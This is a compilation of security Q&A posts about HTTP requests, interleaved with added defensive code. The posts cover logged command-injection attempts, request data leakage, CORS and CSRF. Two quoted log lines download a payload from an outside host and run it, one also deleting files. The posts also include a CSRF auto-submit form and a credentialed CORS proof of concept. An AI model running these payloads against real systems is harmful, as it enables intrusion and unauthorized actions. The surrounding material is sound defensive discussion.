Very Strange Access Request to my website

Recently I got a very odd request to my website. This is from the log file:

20.42.89.182 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-"

It appears to be trying to run some shell commands, including what I believe to be downloading the source of a site with cURL. I tried to visit this URL but it was blocked by my security filter. What is kerbynet? Is this part of Cloudflare, and can it be used to run shell commands on my website?

It should be noted that I use Cloudflare.

What is the term for data leaking from one HTTP request to another and how to prevent it?


Context

We recently added a feature that used a library whose API we misunderstood. Long story short, if user A sends a request to our web application, the library caches some result, and that result may show up in a response to user B’s request. Needless to say, this is a security bug; specifically, data from user A leaks to user B.

Although it is well known that web applications should be stateless, the long dependency graph of such applications makes the likelihood of some downstream library (or its bad usage) accidentally leaking data between requests non-zero. I can imagine this bug is possible with a wide range of web frameworks and environments (e.g., Django, .NET, NodeJS, AWS Lambda), since they all reuse the application between requests to avoid cold starts.

Questions

  1. What is the proper term for data leaking server-side between HTTP requests, due to an honest developer mistake? Terms such as session hijacking and session fixation seem to refer exclusively to malicious attacks.

  2. Are there tools and methods to test for such mistakes or detect them in production?
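An added illustration (not the asker's code) of the bug class: a cache that outlives the request leaks user A's result into user B's response. It shows two ways to scope that cache and a differential test that answers the second question; the handlers, the Request class and the account values are constructed.

```python
import contextvars
from dataclasses import dataclass

# Added example, not the asker's code: a process-wide cache leaks between requests; two fixes and a test.
@dataclass
class Request:
    user: str
    account_id: str

_shared_cache = {}   # lives as long as the worker process, so every request sees it

def lookup_balance(account_id):
    return f"balance-of-{account_id}"   # stand-in for the expensive call being cached

def leaky_handler(req):
    if 'balance' not in _shared_cache:   # BUG: the cache key ignores whose data this is
        _shared_cache['balance'] = lookup_balance(req.account_id)
    return f"{req.user}: {_shared_cache['balance']}"

def keyed_handler(req):
    key = ('balance', req.user, req.account_id)   # fix 1: key by principal and subject
    if key not in _shared_cache:
        _shared_cache[key] = lookup_balance(req.account_id)
    return f"{req.user}: {_shared_cache[key]}"

_request_cache = contextvars.ContextVar('request_cache')   # fix 2: request-scoped store

def cached_lookup(account_id):
    # "library" code: it still caches, but only in the store the current request provides
    cache = _request_cache.get()
    if account_id not in cache:
        cache[account_id] = lookup_balance(account_id)
    return cache[account_id]

def scoped_handler(req):
    token = _request_cache.set({})   # fresh store per request (middleware would do this)
    try:
        return f"{req.user}: {cached_lookup(req.account_id)}"
    finally:
        _request_cache.reset(token)   # nothing survives into the next request

def serve_pair(handler):
    """Serve user A, then user B, with a cold process cache; return B's response."""
    _shared_cache.clear()
    handler(Request('alice', 'acct-A'))
    return handler(Request('bob', 'acct-B'))

def leaks_between_requests(handler):
    """Differential test for the second question: does A's data surface in B's response?"""
    return 'acct-A' in serve_pair(handler)
```

The same two-user replay works as an integration test against a real application: send distinct marker values as different users in sequence and grep every later response for the earlier markers.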

How can a ‘Request’ store a ‘Result’ code and its associated ‘Error’ code and still enforce the relationship between Result and Error?

I’m an application developer creating the database structure to represent a flat file message format. I’d like to ask the collective knowledge the best/correct way to represent the following scenario:

Request table (PK: RequestID) contains requests; a request has a Result property which is indeterminate (null) until the request has completed.

Result table (PK ResultID) is a lookup table containing (currently) two possible results:

  • Success (ResultID = 0)
  • Failure (ResultID = 1)

ErrorCode table (PK ErrorCodeID) is a lookup table containing error details and their parent ResultID:

  • No Error (ErrorCodeID = 0, ResultID = 0)
  • Generic Error (ErrorCodeID = 1, ResultID = 1)
  • Queue Full (ErrorCodeID = 2, ResultID = 1)
  • Unsupported Interface (ErrorCodeID = 3, ResultID = 1)
  • etc…

I’ve created a one to many relationship between Result (one) and ErrorCode (many). A ‘Success’ Result can only have a ‘No Error’ Error Code, while a ‘Failure’ Result can have a single error code of ‘Generic Error’, ‘Queue Full’, ‘Unsupported Interface’, etc.

When the Request has completed, I need to store the result and its associated error code.

I’ve thought of combining the two tables but that strikes me as repeating columns.

I’ve also thought of having the Request table store the ResultID and the ErrorCodeID but this doesn’t enforce the Result to ErrorCode relationship.

I’m a big believer in a database that ‘defends itself’ from bad data, so I want the relationship to reject a Result/ErrorCode combination that is invalid, a.k.a. a Result of ‘Success’ and an ErrorCode of ‘Generic Error’ or a Result of ‘Failure’ and an ErrorCode of ‘No Error’.

I’m also a big believer in solid initial design, so when changes come down the pike at a later date (as they always do) the structure will not need rework.

Thank you in advance for your time.

Regards, John E.
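One way to have the database enforce the pairing, as an added example that is not the asker's schema: store both IDs on Request, but point a composite foreign key at the (ResultID, ErrorCodeID) pair in ErrorCode, so an invalid combination is rejected as a unit. Written against SQLite from Python; the table and lookup values are the ones in the question, the Name columns are assumed.

```python
import sqlite3

# Added example, not the asker's schema: a composite foreign key lets the
# database itself reject a Result/ErrorCode pair that does not exist.
SCHEMA = """
CREATE TABLE Result (
    ResultID INTEGER PRIMARY KEY,
    Name     TEXT NOT NULL UNIQUE
);
CREATE TABLE ErrorCode (
    ErrorCodeID INTEGER PRIMARY KEY,
    ResultID    INTEGER NOT NULL REFERENCES Result(ResultID),
    Name        TEXT NOT NULL UNIQUE,
    UNIQUE (ResultID, ErrorCodeID)   -- parent key for the composite FK below
);
CREATE TABLE Request (
    RequestID   INTEGER PRIMARY KEY,
    ResultID    INTEGER,
    ErrorCodeID INTEGER,
    -- pending: both NULL; completed: both set
    CHECK ((ResultID IS NULL) = (ErrorCodeID IS NULL)),
    -- the pair must exist in ErrorCode, so Success/Generic Error and
    -- Failure/No Error are rejected as a unit
    FOREIGN KEY (ResultID, ErrorCodeID) REFERENCES ErrorCode (ResultID, ErrorCodeID)
);
INSERT INTO Result VALUES (0, 'Success'), (1, 'Failure');
INSERT INTO ErrorCode VALUES (0, 0, 'No Error'), (1, 1, 'Generic Error'),
                             (2, 1, 'Queue Full'), (3, 1, 'Unsupported Interface');
"""

def open_db():
    conn = sqlite3.connect(':memory:')
    conn.execute('PRAGMA foreign_keys = ON')   # SQLite enforces FKs only when asked
    conn.executescript(SCHEMA)
    return conn

def create_request(conn):
    """A new request has no outcome yet: both columns NULL."""
    return conn.execute('INSERT INTO Request (ResultID, ErrorCodeID) VALUES (NULL, NULL)').lastrowid

def complete_request(conn, request_id, result_id, error_code_id):
    """Record the outcome; returns False when the database rejects the pair."""
    try:
        conn.execute('UPDATE Request SET ResultID = ?, ErrorCodeID = ? WHERE RequestID = ?',
                     (result_id, error_code_id, request_id))
        return True
    except sqlite3.IntegrityError:
        return False
```

Adding a new error code later is a single row in ErrorCode; the Request table and its constraints do not change.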

OWASP ZAP bruteforce 3 parameters Request from 3 payloads (parallel)

How can I fuzz a request with 3 parameters (locations) and 3 payloads?

request1 => parameter1=payload1.1; parameter2=payload2.1; parameter3=payload3.1;

request2 => parameter1=payload1.2; parameter2=payload2.2; parameter3=payload3.2;

request3 => parameter1=payload1.3; parameter2=payload2.3; parameter3=payload3.3;

Where payload1.2 means take string #2 from payload1, etc.

Thanks.

Burp Suite can not intercept the wget and curl HTTP request

I use Burp Suite as a proxy listening on 127.0.0.1:8080, and I also set the HTTP Proxy to 127.0.0.1:8080.

Now Burp Suite can intercept all the browsers (e.g. Firefox, Safari, Chrome) and applications (e.g. Dictionary) on my Mac,

but cannot intercept wget’s and curl’s requests.

such as:

curl www.apple.com 

Aren’t curl and wget using HTTP protocol requests?


EDIT-01

  1. Why, when I set the macOS preferences HTTP Proxy to 127.0.0.1:8080, do all the browsers and applications use this proxy by default? I did not set it in each browser.

  2. Why do curl and wget not use the proxy by default? Even when I set --proxy it still does not work.

wget www.cloud123.com --proxy 127.0.0.1:8080 

Cross-Domain Request is a CSRF Attack? (CORS)

CORS is an HTTP header suite that “relaxes” the SOP. One of the CORS misconfigurations is reflecting, without a regexp check, the client’s “Origin” header into the “ACAO” response header. If this happens together with “ACAC: true”, every cross-domain HTTP request is allowed.

If an attacker induces a victim to visit, in another tab of the browser, a malicious web server with a JavaScript CORS exploit, the browser, triggered by the exploit, makes an HTTP request to a vulnerable web page and sends the output to a web server controlled by the attacker.

It happens because CORS is misconfigured and because the vulnerable page doesn’t have a CSRF token.

Was this cross-domain HTTP request essentially a CSRF attack? If yes, does it happen because there is a CORS misconfiguration and there isn’t a CSRF token? What happens if it has an anti-XSRF token?

I read that CORS and SOP can’t block a CSRF attack, because the policy only prevents access to the response of the request, but the HTTP request works anyway.

If CORS and SOP can’t block a CSRF attack, could the CSRF attack also work if the target web server is not vulnerable to a CORS misconfiguration?
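An added example, not from the post, of the misconfiguration it describes (the Origin header echoed into ACAO together with ACAC: true) beside an exact-match allowlist, plus the browser-side decision those headers drive: the request reaches the server either way, the headers only decide whether the cross-origin script may read the response. Origins are constructed.

```python
# Added example, not from the post: reflected Origin versus an exact allowlist.
ALLOWED_ORIGINS = {'https://app.example', 'https://admin.example'}   # constructed

def cors_headers_reflecting(origin):
    """Vulnerable: whatever Origin the browser sent is echoed back, with credentials."""
    if origin is None:
        return {}
    return {'Access-Control-Allow-Origin': origin,
            'Access-Control-Allow-Credentials': 'true'}

def cors_headers_allowlisted(origin):
    """Fixed: only an exact, scheme-included match gets CORS headers; others get none."""
    if origin not in ALLOWED_ORIGINS:
        return {}
    return {'Access-Control-Allow-Origin': origin,
            'Access-Control-Allow-Credentials': 'true',
            'Vary': 'Origin'}   # keeps a cache from serving one origin's grant to another

def response_readable_cross_origin(headers, requesting_origin):
    """The browser's decision: may script on requesting_origin read this response?
    The request itself was already sent (and any cookies with it); SOP only gates reading."""
    acao = headers.get('Access-Control-Allow-Origin')
    if acao is None:
        return False
    if headers.get('Access-Control-Allow-Credentials') == 'true' and acao == '*':
        return False   # the wildcard is not honoured for credentialed requests
    return acao == '*' or acao == requesting_origin
```

Note that neither variant stops the request from being made or a state change from happening server-side; that is what a CSRF token (or SameSite cookies) is for.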

Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs:

170.81.46.70 - -  "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
93.157.62.102 - -  "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
218.161.62.117 - -  "GET / HTTP/1.1" 400 157 "-" "-"
61.96.64.130 - -  "GET / HTTP/1.1" 400 157 "-" "-"

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attempted from these entries?
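Both this post and the kerbynet one above show the same thing in the access log: a query string carrying shell commands, once percent-encoded and once with `+` for spaces. An added example (not from either post) of how to pick such lines out of a combined-format log for alerting: decode the target first, then look for a shell separator next to a download or execute command. The sample lines are constructed in the shape of the posted ones, with RFC 5737 addresses.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in the shape of the two posts' logs; RFC 5737
# addresses, not the IPs from the page.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F198.51.100.7%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-"
192.0.2.11 - - "GET /shell?cd+/tmp;rm+-rf+*;wget+198.51.100.8/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
192.0.2.12 - - [12/Aug/2020:18:49:01 -0400] "GET /index.html?q=curl+recipes HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.13 - - "GET / HTTP/1.1" 400 157 "-" "-"
"""

# Client, optional timestamp, request line, status (combined-log shape; the
# target is matched lazily because a payload may itself contain spaces).
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ (?:\[[^\]]*\] )?'
                     r'"(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3})')
META_RE = re.compile(r'[;|&`$]')   # shell command separators / substitution
CMD_RE = re.compile(r'(?:^|[;|&`\s])(?:cd|wget|curl|sh|bash|rm|chmod|tftp)(?:\s|$)')

def decode_target(target):
    # %20, %2F and '+' are how the payload hides from naive string matching
    return unquote_plus(target)

def is_command_injection(target):
    """Heuristic: a shell separator plus a download/exec command in the query string."""
    query = decode_target(target).partition('?')[2]
    return bool(META_RE.search(query) and CMD_RE.search(query))

def flag_injection_attempts(log_text):
    """Return the client, status and decoded target of every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and is_command_injection(m['target']):
            hits.append({'ip': m['ip'], 'status': int(m['status']),
                         'decoded': decode_target(m['target'])})
    return hits
```

The status code only says what this server answered (a 301/302 redirect here); it does not tell you whether the command ran, which is why the check is on the decoded request, not the response.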

Cross-Site Request Forgery from another origin

I’m trying to solve one of the challenges of OWASP Juice Shop. After some attempts, I started looking for a solution (this), and it’s exactly what I did, but it doesn’t work.

I’m running the app in a local Docker container (tried also online, but same problem).

On the console I get

Uncaught DOMException: Permission denied to access property "document" on cross-origin object

and it’s OK since that’s what I’m expecting to see, but when I go to the user profile the username didn’t change. In the network panel of the console I can see the packet being sent (because of the SOP I can’t see the response), so I don’t know what the problem can be.

What am I doing wrong? Is my understanding of the attack wrong, or is it just a problem with the implementation of the web app?

CSRF: GET request with POST data?

I have stumbled upon a vulnerability in a web application and was wondering if it was exploitable / worth reporting. The bug is a CSRF which would allow an attacker to send friend requests to himself from other user accounts (in turn letting him view sensitive information about the victim accounts). The request is usually made using a POST request. Using usual exploitation techniques, I crafted the following webpage.

<html>
    <head></head>
    <body>
        <span>csrf test</span>
        <form action="http://vulnerable.com/friendRequest.asp" method="POST">
            <input type="hidden" name="MessageArea" value="this is a test of csrf">
            <input type="hidden" name="FriendName" value="testuser">
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

Unfortunately though, the website checks for the origin header in the request, so this payload doesn’t work. Switching to a GET request and deleting the origin header actually sends the request successfully. The request looks like the following.

GET /friendRequest.asp HTTP/1.1
Host: www.vulnerable.com
User-Agent: Mozilla/5.0 ...
(no origin header)
Cookie: secret_cookie

MessageArea=this+is+a+test+for+csrf&FriendName=testuser

As you can see, this is a GET request with POST data sent at the bottom. Unfortunately, the request doesn’t go through with the parameters in the URL like in a true GET request. Is there any way to use an external form (like the one above) to send a malformed GET request with POST data to achieve this CSRF? I have looked into XMLHttpRequest and fetch but I’m not sure that they are the right tools for the job.

Is it possible to send a POST CORS request with json data?

Is it possible to send a custom POST CORS request with json data?

I found that the website example.com is vulnerable to CORS and it’s accepting my Origin header, https://mywebsite.com; however, the request is a POST one and if I try without any POST data I get:

{"errorCode":"invalid","message":"Invalid json body","statusCode":400}

I was wondering if it’s possible to send CORS requests containing JSON data. If it’s possible, how should I edit my proof-of-concept code?

At the moment I’m using the following:

<script>
var createCORSRequest = function(method, url) {
  var xhr = new XMLHttpRequest();
  if ("withCredentials" in xhr) {
    // Most browsers.
    xhr.open(method, url, true);
  } else if (typeof XDomainRequest != "undefined") {
    // IE8 & IE9
    xhr = new XDomainRequest();
    xhr.open(method, url);
  } else {
    // CORS not supported.
    xhr = null;
  }
  return xhr;
};

var url = 'https://example.com/api/v1/post';
var method = 'POST';
var xhr = createCORSRequest(method, url);

xhr.onload = function() {
  // Success code goes here.
};

xhr.onerror = function() {
  // Error code goes here.
};

xhr.withCredentials = true;
xhr.send();
</script>

But I’ll need to add {"id":"test","name":"test"} as POST JSON data to my PoC to make it work. How could I do that?